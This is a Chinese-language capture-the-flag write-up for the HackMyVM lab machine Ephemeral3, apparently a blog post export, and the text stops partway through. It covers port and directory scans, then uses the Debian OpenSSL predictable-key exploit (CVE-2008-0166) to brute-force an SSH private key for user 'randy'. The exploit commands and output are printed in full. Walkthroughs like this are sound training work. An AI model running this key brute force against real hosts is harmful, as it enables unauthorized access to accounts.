{"id":672,"date":"2024-04-30T22:19:00","date_gmt":"2024-04-30T14:19:00","guid":{"rendered":"http:\/\/162.14.82.114\/?p=672"},"modified":"2024-04-30T22:19:00","modified_gmt":"2024-04-30T14:19:00","slug":"hmv-_-ephemeral3","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/672\/04\/30\/2024\/","title":{"rendered":"hmv[-_-]Ephemeral3"},"content":{"rendered":"<h1>Ephemeral3<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218540.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218540.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430211243892\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218542.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218542.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430211217257\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ rustscan -a 192.168.0.145 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.145:22\nOpen 192.168.0.145:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex &#039;^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*&lt;title&gt;HP (Color |)LaserJet ([\\w._ -]+)&nbsp;&nbsp;&nbsp;&#039;\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDGz6PJAaGubPsnM5Ouy+7FRmx7kGYrARlePa+oaH+0twb5juceP7XcxZEsVNul09P97Hx\/bxOVF60RuFCuePGHACTxWsKR3IxvRRXMTOagB0JpcOv9kG+MGJ3HMLPgFKdbraPIb3o7G6pmsucjBxE5xhbk\/t5XWIgG04NOfGKy+\/J68CvDgI1emvEvp1xGyfjX9kx2AR7HHFrSFyA9eKvtwr41AB\/b5FUa8p2lg6ckACWaQiFlk7M\/or4SYem4bDUWhDbJukO3K+aHW0copkyKnX3ZkfZ6APzIfnBvtGzpvIX4rBi7AvNBVz+Fp1zJR6cUZIuBIAoUYgJAXrUC\/nOs5U0jwU7VfFywpGHxu8CNfwX9hzxgNOM++FFm96ZADuoOcl97sJF2EFE766k0xXH4vDoueQMaH\/r5HLVceTP9rptQE3rp2Wqqe9qw12Fr7SXXurww87su9JWhPhdpj2l+er389PLNUP9Cfm96EpiFDu9DjEBCSf9Umi90lC+sQ5c=\n|   256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE0JnAHsHoiXd4LpC3ZJtc9s+aJOv07As7h8ZrSMUE0qGVqvxQfHpu6fvO0nW5EbgDYgO3wKIyGvWtItQVI9RBY=\n|   256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEwc\/eFydLMAK3ZSBbnBYrPOlRnplfkgo51+gA3GCmvU\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Apache2 Ubuntu Default Page: It works\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.145\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.145\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 10918]\n\/note.txt             (Status: 200) [Size: 159]\n\/agency               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.145\/agency\/]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ whatweb http:\/\/192.168.0.145\/                                                                                             \nhttp:\/\/192.168.0.145\/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.0.145], Title[Apache2 Ubuntu Default Page: It works]<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218543.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218543.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430213605409\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7f51\u7ad9\u4e3b\u4eba\u4ee5\u53ca\u7591\u4f3cdns\u89e3\u6790\uff0c\u6ca1\u6709\u601d\u8def\u53ef\u4ee5\u5c1d\u8bd5\uff1a<\/p>\n<pre><code class=\"language-apl\">randy@ephemeral.com<\/code><\/pre>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ curl http:\/\/192.168.0.145\/note.txt \nHey! I just generated your keys with OpenSSL. You should be able to use your private key now! \n\nIf you have any questions just email me at henry@ephemeral.com<\/code><\/pre>\n<p>\u8fd9\u91cc\u63d0\u793a\u4f7f\u7528\u4e86<code>openssl<\/code>\u8fdb\u884c\u751f\u6210\u5bc6\u7801\uff0c\u4e14\u6f0f\u6d1e\u626b\u63cf\u53d1\u73b0\u7248\u672c\u4f3c\u4e4e\u662f\u6f0f\u6d1e\u5b58\u5728\u7684\u7684\u7248\u672c<code>OpenSSH 8.2p1<\/code>\uff0c\u7b49\u4e0b\u9614\u4ee5\u770b\u4e00\u4e0b\u3002<\/p>\n<p>\u627e\u5230\u4e09\u4e2a\u4eba\u540d\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218544.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218544.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430213255681\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.145\/agency\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218545.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218545.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430211934619\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218546.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218546.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430212512877\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218548.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218548.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430212530546\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u9012\u5f52\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ feroxbuster -u http:\/\/192.168.0.145\/agency\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 3 -s 200 302\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.0.145\/agency\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.2\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 3\n \ud83c\udf89  New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n200      GET        4l       11w     1502c http:\/\/192.168.0.145\/agency\/assets\/img\/favicon.png\n200      GET      391l     1331w    21942c http:\/\/192.168.0.145\/agency\/ui-elements.html\n200      GET       10l       22w      654c http:\/\/192.168.0.145\/agency\/assets\/img\/paper-plane.svg\n200      GET      354l     1104w    18726c http:\/\/192.168.0.145\/agency\/index.html\n200      GET       10l       22w     1264c http:\/\/192.168.0.145\/agency\/assets\/img\/anchor.svg\n200      GET       10l       22w     1016c http:\/\/192.168.0.145\/agency\/assets\/img\/chemestry.svg\n200      GET       10l       22w      846c http:\/\/192.168.0.145\/agency\/assets\/img\/basket.svg\n200      GET      203l      583w     7307c http:\/\/192.168.0.145\/agency\/assets\/js\/script.js\n200      GET       10l       24w     1534c http:\/\/192.168.0.145\/agency\/assets\/img\/bycicle.svg\n200      GET      347l     1604w   125627c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-4.jpg\n200      GET      390l     2531w   210561c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-5.jpg\n200      GET       10l       22w      773c http:\/\/192.168.0.145\/agency\/assets\/img\/photo.svg\n200      GET        1l       10w      929c http:\/\/192.168.0.145\/agency\/assets\/js\/jquery.countTo.min.js\n200      GET        6l     1429w   121200c http:\/\/192.168.0.145\/agency\/assets\/css\/bootstrap.min.css\n200      GET       31l      332w    18421c http:\/\/192.168.0.145\/agency\/assets\/js\/jquery.shuffle.min.js\n200      GET        6l      102w     8415c http:\/\/192.168.0.145\/agency\/assets\/js\/jquery.slicknav.min.js\n200      GET      227l      531w    10566c http:\/\/192.168.0.145\/agency\/contact.html\n200      GET      247l      752w    12590c http:\/\/192.168.0.145\/agency\/portfolio-item.html\n200      GET      824l     4352w   380860c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-6.jpg\n200      GET      257l     1140w    85913c http:\/\/192.168.0.145\/agency\/assets\/img\/ipad-pro.png\n200      GET     1592l     3107w    28491c http:\/\/192.168.0.145\/agency\/assets\/css\/style.css\n200      GET       10l       22w     1332c http:\/\/192.168.0.145\/agency\/assets\/img\/microphone.svg\n200      GET       10l       22w     1599c http:\/\/192.168.0.145\/agency\/assets\/img\/rocket.svg\n200      GET       21l       76w     5438c http:\/\/192.168.0.145\/agency\/assets\/img\/apple-touch-icon.png\n200      GET      302l      889w    16880c http:\/\/192.168.0.145\/agency\/blog.html\n200      GET        7l      432w    37045c http:\/\/192.168.0.145\/agency\/assets\/js\/bootstrap.min.js\n200      GET        9l      360w    33963c http:\/\/192.168.0.145\/agency\/assets\/js\/bootstrap-select.min.js\n200      GET      270l      752w    14587c http:\/\/192.168.0.145\/agency\/portfolio.html\n200      GET      715l     1330w    10630c http:\/\/192.168.0.145\/agency\/assets\/css\/responsive.css\n200      GET     1136l     5834w   443540c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-2.jpg\n200      GET      736l     4259w   383267c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-3.jpg\n200      GET       42l      234w    19279c http:\/\/192.168.0.145\/agency\/assets\/img\/author.jpg\n200      GET       30l      144w    12328c http:\/\/192.168.0.145\/agency\/assets\/img\/author-3.jpg\n200      GET       15l       62w     5367c http:\/\/192.168.0.145\/agency\/assets\/img\/author-4.jpg\n200      GET      133l     1266w    80983c http:\/\/192.168.0.145\/agency\/assets\/img\/map.png\n200      GET        8l       51w     5666c http:\/\/192.168.0.145\/agency\/assets\/img\/author-2.jpg\n200      GET      192l     1581w   147777c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-8.jpg\n200      GET      371l     2240w   200818c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-1.jpg\n200      GET      354l     1104w    18726c http:\/\/192.168.0.145\/agency\/\n200      GET      407l     2273w   201863c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-11.jpg\n200      GET      390l     2205w   192021c http:\/\/192.168.0.145\/agency\/assets\/img\/blog-hero.jpg\n200      GET      322l     2059w   185859c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-7.jpg\n200      GET      865l     5474w   448517c http:\/\/192.168.0.145\/agency\/assets\/img\/hero.jpg\n200      GET      324l     1925w   170008c http:\/\/192.168.0.145\/agency\/assets\/img\/contact-hero.jpg\n200      GET      421l     2137w   179042c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-hero.jpg\n200      GET      971l     4878w   389491c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-12.jpg\n200      GET     1857l    11063w   861394c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-9.jpg\n200      GET     2111l    12010w   950998c http:\/\/192.168.0.145\/agency\/assets\/img\/portfolio-10.jpg\n[####################] - 87s   220639\/220639  0s      found:48      errors:12     \n[####################] - 86s   220546\/220546  2551\/s  http:\/\/192.168.0.145\/agency\/ \n[####################] - 0s    220546\/220546  3063139\/s http:\/\/192.168.0.145\/agency\/assets\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  1274832\/s http:\/\/192.168.0.145\/agency\/assets\/img\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  3675767\/s http:\/\/192.168.0.145\/agency\/assets\/css\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  2689585\/s http:\/\/192.168.0.145\/agency\/assets\/js\/ =&gt; Directory listing<\/code><\/pre>\n<h3>openssl\u6f0f\u6d1e\u5229\u7528<\/h3>\n<p>\u6ca1\u6709\u53d1\u73b0\u5565\u4e1c\u897f\uff0c\u67e5\u770b\u4e00\u4e0b\u5e38\u89c1\u7684\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218549.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218549.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430212444615\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ searchsploit -m linux\/remote\/5720.py\n  Exploit: OpenSSL 0.9.8c-1 &lt; 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH\n      URL: https:\/\/www.exploit-db.com\/exploits\/5720\n     Path: \/usr\/share\/exploitdb\/exploits\/linux\/remote\/5720.py\n    Codes: OSVDB-45029, CVE-2008-3280, CVE-2008-0166\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/Ephemeral3\/5720.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ head -n 30 5720.py                              \n#!\/bin\/python\n#       This program is free software; you can redistribute it and\/or modify\n#       it under the terms of the GNU General Public License as published by\n#       the Free Software Foundation; either version 2 of the License, or\n#       (at your option) any later version.\n#\n#       This program is distributed in the hope that it will be useful,\n#       but WITHOUT ANY WARRANTY; without even the implied warranty of\n#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#       GNU General Public License for more details.\n#\n#       You should have received a copy of the GNU General Public License\n#       along with this program; if not, write to the Free Software\n#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n#       MA 02110-1301, USA.\n############################################################################\n# Autor: hitz - WarCat team (warcat.no-ip.org)\n# Collaborator: pretoriano\n#\n# 1. Download https:\/\/gitlab.com\/exploit-database\/exploitdb-bin-sploits\/-\/raw\/main\/bin-sploits\/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)\n#\n# 2. Extract it to a directory\n#\n# 3. Execute the python script\n#     - something like: python exploit.py \/home\/hitz\/keys 192.168.1.240 root 22 5\n#     - execute: python exploit.py (without parameters) to display the help\n#     - if the key is found, the script shows something like that:\n#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121\n#                 Execute: ssh -lroot -p22 -i \/home\/hitz\/keys\/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240\n############################################################################\n\nwget https:\/\/github.com\/offensive-security\/exploitdb-bin-sploits\/raw\/master\/bin-sploits\/5622.tar.bz2 \ntar -xvf 5622.tar.bz2\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ python2 5720.py .\/rsa\/2048 192.168.0.145 randy                                                       \n\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org\nTested 348 keys | Remaining 32420 keys | Aprox. Speed 69\/sec\nTested 715 keys | Remaining 32053 keys | Aprox. Speed 73\/sec\nTested 1063 keys | Remaining 31705 keys | Aprox. Speed 69\/sec\nTested 1282 keys | Remaining 31486 keys | Aprox. Speed 43\/sec\n.............\nTested 15729 keys | Remaining 17039 keys | Aprox. Speed 53\/sec\nTested 15818 keys | Remaining 16950 keys | Aprox. Speed 17\/sec\nTested 15827 keys | Remaining 16941 keys | Aprox. Speed 1\/sec\nTested 16032 keys | Remaining 16736 keys | Aprox. Speed 41\/sec\nTested 16246 keys | Remaining 16522 keys | Aprox. Speed 42\/sec\n\nKey Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671\nExecute: ssh -lrandy -p22 -i .\/rsa\/2048\/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.0.145\n\nTested 16289 keys | Remaining 16479 keys | Aprox. Speed 8\/sec<\/code><\/pre>\n<p>\u62ff\u5230\u5bc6\u94a5\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218550.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218550.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430220852578\" style=\"zoom:50%;\" 